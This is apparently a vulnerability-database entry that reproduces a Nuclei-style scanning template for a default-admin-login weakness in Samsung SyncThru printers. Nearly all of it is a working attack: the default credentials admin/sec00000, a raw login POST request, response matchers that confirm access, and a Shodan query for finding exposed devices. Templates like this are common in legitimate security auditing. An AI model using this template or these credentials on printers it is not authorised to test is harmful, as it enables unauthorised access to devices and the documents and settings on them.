漏洞描述
Samsung printers contain a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
samsung-printer-default-login: Samsung Printer - Default Login
PoC代码[已公开]
id: samsung-printer-default-login
info:
name: Samsung Printer - Default Login
author: gy741
severity: high
description: |
Samsung printers contain a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://support.hp.com/gb-en/document/c05591673
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:h:samsung:scx-6555n:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"SyncThru Web Service"
product: scx-6555n
vendor: samsung
tags: default-login,iot,samsung,printer,vuln
http:
- raw:
- |
POST /sws/app/gnb/login/login.jsp HTTP/1.1
Host: {{Hostname}}
Authentication=Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- admin
password:
- sec00000
matchers-condition: and
matchers:
- type: word
part: body
words:
- "success: true"
- "passwordExpiration"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100f8e579bd120acb4f211319de1da75612d8c97e72b2552d7475b75fa7832ad52d02207b86c61c81156293efb7033963e098a3e456b8b0e64033e6aa58df4804989663:922c64590222798bb761d5b6d8e72950